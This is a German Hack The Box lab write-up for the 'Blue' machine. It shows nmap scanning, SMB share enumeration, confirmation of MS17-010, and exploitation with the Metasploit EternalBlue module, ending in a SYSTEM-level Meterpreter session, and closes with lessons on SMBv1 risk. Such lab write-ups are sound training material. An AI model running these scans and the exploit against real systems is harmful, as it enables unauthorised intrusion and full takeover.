HTB · published
Blue
Hack The Box CPTS-Roadmap Writeup für Blue: Windows 7 SP1, SMBv1, MS17-010 EternalBlue und direkter SYSTEM-Zugriff.
Metadaten
- Name: Blue
- IP Address:
10.129.168.63 - Plattform: Windows
- Kategorie: SMB / MS17-010 / EternalBlue
- Schwierigkeit: Easy
- Ziel(e): User, Root / SYSTEM
- Kurzbeschreibung: Blue ist eine der bekanntesten und einfachsten Maschinen auf Hack The Box. Sie zeigt sehr direkt, wie kritisch die SMBv1-Schwachstelle MS17-010 beziehungsweise EternalBlue war. Über Port
445wird Windows 7 SP1 erkannt, die Maschine als verwundbar bestätigt und anschließend direkt SYSTEM-Zugriff erzielt.
Reconnaissance / Enumeration
Der initiale Full-Port-Scan zeigte SMB/RPC und mehrere dynamische Windows-Ports:
nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.129.168.63
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Der Service-Scan auf den wichtigsten Ports bestätigte ein altes Windows-System:
nmap -p 135,139,445 -sCV -oA scans/nmap-tcpscripts 10.129.168.63
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
Wichtige Nmap-Erkenntnisse:
Host: HARIS-PC
OS: Windows 7 Professional 7601 Service Pack 1
Workgroup: WORKGROUP
SMB message signing: disabled / not required
SMBv1: present
Damit war MS17-010 sofort ein sehr naheliegender Prüfpunkt.
SMB Enumeration
Mit NetExec wurden die SMB-Shares enumeriert:
netexec smb 10.129.168.63 -u user -p pass --shares
SMB 10.129.168.63 445 HARIS-PC [*] Windows 7 / Server 2008 R2 Build 7601 x64
SMB 10.129.168.63 445 HARIS-PC [*] Enumerated shares
Share Permissions Remark
----- ----------- ------
ADMIN$ Remote Admin
C$ Default share
IPC$ Remote IPC
Share READ
Users READ
Die Kombination aus Windows 7 SP1, SMBv1 und deaktiviertem Signing machte EternalBlue sehr wahrscheinlich.
Vulnerability Scan
Der Nmap-Vuln-Scan bestätigte MS17-010:
nmap -p 445 -vvv --script vuln -oA scans/nmap-smbvulns 10.129.168.63
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
Damit war der Exploit-Weg klar: EternalBlue gegen SMB auf Port 445.
Exploitation: MS17-010 EternalBlue
Für die Ausnutzung wurde das Metasploit-Modul verwendet:
exploit/windows/smb/ms17_010_eternalblue
Relevante Optionen:
RHOSTS 10.129.168.63
RPORT 445
VERIFY_ARCH true
VERIFY_TARGET true
Ausführung:
msf exploit(windows/smb/ms17_010_eternalblue) > run
Erfolgreiche Session:
[*] 10.129.168.63:445 - Sending egg to corrupted connection.
[*] 10.129.168.63:445 - Triggering free of corrupted buffer.
[*] Sending stage (230982 bytes) to 10.129.168.63
[+] 10.129.168.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.10.14.118:4444 -> 10.129.168.63:49158)
Die Meterpreter-Session lief direkt als SYSTEM:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Damit waren Foothold und Privilege Escalation in einem Schritt erledigt.
User Flag
Die User-Flag lag im Desktop-Verzeichnis von haris:
type C:\Users\haris\Desktop\user.txt
7a8f3[REDACTED-USER-FLAG]1444
Root Flag
Da die Session bereits als NT AUTHORITY\SYSTEM lief, konnte die Root-Flag direkt gelesen werden:
type C:\Users\Administrator\Desktop\root.txt
7c89a[REDACTED-ROOT-FLAG]9f1f
Post-Exploitation
- User: Zugriff auf
C:\Users\haris\Desktop\user.txt. - Root / Admin: SYSTEM-Zugriff über EternalBlue.
- Root-Flag: Zugriff auf
C:\Users\Administrator\Desktop\root.txt. - Lateral Movement: Nicht nötig.
- Separate Privilege Escalation: Nicht nötig, da der Exploit direkt SYSTEM lieferte.
Lessons Learned
- Windows 7 SP1 ist ein starker Hinweis: Bei alten Windows-Systemen gehört MS17-010 sofort auf die Checkliste.
- SMBv1 ist kritisch: SMBv1 auf Port
445war hier der zentrale Angriffsvektor. - Message Signing hilft bei der Einordnung: Nicht erforderliches SMB-Signing ist ein gefährlicher Footprint.
- Nmap Vuln-Scripts sind nützlich:
smb-vuln-ms17-010bestätigte die Vermutung schnell. - EternalBlue zeigt Impact sehr direkt: Ein einzelner SMB-RCE führte direkt zu
NT AUTHORITY\SYSTEM.
Notizen
Blue ist technisch simpel, aber als Lernmaschine extrem wertvoll: Sie zeigt, warum veraltete Systeme und ungepatchtes SMBv1 ein katastrophales Risiko darstellen. Für CPTS ist sie ein guter Reminder, alte Services nicht zu übersehen und bekannte Schwachstellen systematisch zu prüfen.